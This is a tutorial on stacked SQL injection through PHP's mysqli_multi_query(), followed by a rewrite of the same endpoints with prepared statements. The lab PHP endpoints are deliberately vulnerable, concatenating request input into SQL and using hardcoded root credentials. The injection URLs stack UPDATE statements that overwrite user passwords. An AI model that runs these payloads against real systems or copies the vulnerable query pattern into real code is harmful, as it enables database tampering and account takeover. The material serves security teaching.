Prerequisites:
- multi_query() in PHP's mysqli extension sends several semicolon-separated SQL statements to the server in one call.
- Example: input such as `id=1;update xxx;` appends a second statement after the one the code intended.
Definition: if the backend runs its SQL through multi_query(), several statements are executed per call, so user input can stack extra statements behind the intended one. This is stacked injection. Two caveats: mysqli_query() switches the connection's multi-statement option off, so the same payload there fails with a syntax error at the `;` (it is still injectable, just not stackable); and the server processes the batch in order, so the first statement must parse or nothing runs, while an error in an injected later statement is only reported if the code calls mysqli_next_result().
Lab setup:
```php
<?php
$id=$_GET['id'];
$conn=mysqli_connect("192.168.190.133", "root", "123456", "crm",3306);
mysqli_query($conn, "set names utf8");
// select-type injection point: $id is concatenated straight into the statement
// (the insert and update variants follow below)
$sql="select * from userinfo where id=$id";
// multi_query(): every ';'-separated statement in $sql is sent, so an injected statement runs too
$res=mysqli_multi_query($conn, $sql) or die(mysqli_error($conn));
if($res){
echo "yes";
}else{
echo "no";
}
?>
```
Verification:
Prepare the injection:
```
http://192.168.190.133/wh067/08-sqli/demo1.php?id=2;update userinfo set password = '123' where id=2;
```
With `$sql="select * from userinfo where id=$id"` the server receives `select * from userinfo where id=2;update userinfo set password = '123' where id=2;`, i.e. two statements, and mysqli_multi_query() runs both.
Result: check the row with id=2 in userinfo; if the stacked update ran, its password column is now '123'.
If the injection point is a write statement: insert
Lab:
```php
<?php
$id=$_GET['id'];
$conn=mysqli_connect("192.168.190.133", "root", "123456", "crm",3306);
mysqli_query($conn, "set names utf8");
// $sql="select * from userinfo where id=$id";
// $id lands inside values( ... ), so a payload has to close the parenthesis before stacking
$sql="insert into userinfo(id) values($id)";
$res=mysqli_multi_query($conn, $sql) or die(mysqli_error($conn));
if($res){
echo "yes";
}else{
echo "no";
}
?>
```
Injection SQL:
```
http://192.168.190.133/wh067/08-sqli/demo1.php?id=11);update userinfo set password = '666' where id=2;-- -)
```
The leading `)` closes the `values(` of the template, the `;` starts the stacked update, and `-- -` comments out the `)` the template appends, so the batch becomes `insert into userinfo(id) values(11);update userinfo set password = '666' where id=2;-- -)`.
If the injection point is a write statement: update
Lab:
```php
<?php
$id=$_GET['id'];
$account=$_GET['account'];
$conn=mysqli_connect("192.168.190.133", "root", "123456", "crm",3306);
mysqli_query($conn, "set names utf8");
// $sql="select * from userinfo where id=$id";
// $sql="insert into userinfo(id) values($id)";
// two injection points: $account sits inside single quotes, $id is unquoted after "where id="
$sql="update userinfo set account='$account' where id=$id";
$res=mysqli_multi_query($conn, $sql) or die(mysqli_error($conn));
if($res){
echo "yes";
}else{
echo "no";
}
?>
```
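The three labs above share one defect: the statement text is built from request input and handed to mysqli_multi_query(). As an added example (not the page's lab code), here are the same select, insert and update endpoints rewritten with a fixed statement text and bound parameters, plus a helper that shows why the page's payloads need multi_query() at all: mysqli_query() turns multi-statements off and fails at the `;`. It assumes the page's lab database (host 192.168.190.133, db crm, table userinfo with an integer id, account and password columns) and PHP 8 with mysqlnd; the function names and the account value fed to updateAccount() are this example's own.

```php
<?php
// Added example, not the page's lab code: the page's three endpoints (select, insert,
// update) rewritten so that a stacked statement inside $id or $account cannot run.
// Assumptions: the lab database from the page (host 192.168.190.133, user root, db crm,
// table userinfo with integer id, account and password columns), PHP 8 with mysqlnd.
// Function names below are this example's own.

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw mysqli_sql_exception instead of returning false

$conn = mysqli_connect("192.168.190.133", "root", "123456", "crm", 3306);
mysqli_set_charset($conn, "utf8mb4"); // API call instead of the raw "set names" query

// Accept only a plain decimal id; "2;update ..." and "11);update ..." are rejected here,
// before any SQL is sent.
function requireId(string $raw): int {
    if (!preg_match('/^\d{1,10}$/', $raw)) {
        throw new InvalidArgumentException("id must be a decimal integer, got: $raw");
    }
    return (int) $raw;
}

// select-type endpoint: statement text is constant, the value travels as a bound parameter
function findUser(mysqli $conn, string $rawId): ?array {
    $id = requireId($rawId);
    $stmt = $conn->prepare("select id, account from userinfo where id = ?");
    $stmt->bind_param("i", $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    return $row ?: null;
}

// insert-type endpoint
function insertUser(mysqli $conn, string $rawId): int {
    $id = requireId($rawId);
    $stmt = $conn->prepare("insert into userinfo(id) values(?)");
    $stmt->bind_param("i", $id);
    $stmt->execute();
    return $stmt->affected_rows;
}

// update-type endpoint: $account is bound as a string, so quotes or ';' inside it are data, not SQL
function updateAccount(mysqli $conn, string $rawId, string $account): int {
    $id = requireId($rawId);
    $stmt = $conn->prepare("update userinfo set account = ? where id = ?");
    $stmt->bind_param("si", $account, $id);
    $stmt->execute();
    return $stmt->affected_rows;
}

// For comparison: the page's string-building select, but run through mysqli_query().
// mysqli_query() sets MYSQL_OPTION_MULTI_STATEMENTS_OFF on the connection, so the stacked
// payload dies with MySQL error 1064 (parse error) at the ';'. This blocks stacking only;
// the statement is still injectable (UNION, boolean, time based), so it is not a fix,
// just the reason the page's payloads require multi_query() to work.
function stackedPayloadRejectedByMysqliQuery(mysqli $conn, string $payload): bool {
    try {
        mysqli_query($conn, "select * from userinfo where id=$payload");
        return false;                  // the batch ran: this connection allows stacking
    } catch (mysqli_sql_exception $e) {
        return $e->getCode() === 1064; // ER_PARSE_ERROR at the injected ';'
    }
}

// Demo with the page's two payloads: both are refused before any SQL is sent.
$selectPayload = "2;update userinfo set password = '123' where id=2;";
$insertPayload = "11);update userinfo set password = '666' where id=2;-- -)";

var_dump(stackedPayloadRejectedByMysqliQuery($conn, $selectPayload));

foreach ([['findUser', $selectPayload], ['insertUser', $insertPayload]] as [$fn, $payload]) {
    try {
        $fn($conn, $payload);
    } catch (InvalidArgumentException $e) {
        echo $fn, ": ", $e->getMessage(), "\n";
    }
}

// Constructed account value: with a bound parameter it is stored literally, nothing is executed.
echo "rows updated: ", updateAccount($conn, "2", "'; update userinfo set password='x' -- "), "\n";
```

The id check is deliberately a whitelist rather than a cast: a `(int)` cast of `"2;update ..."` would silently yield 2 and hide the attack attempt, whereas rejecting it lets the request be logged. If the application uses PDO instead of mysqli, the same rule applies, with one extra caveat: PDO_MySQL permits stacked statements in query()/exec() by default, and can be told not to with `PDO::MYSQL_ATTR_MULTI_STATEMENTS => false`; bound parameters remain the actual fix in either case.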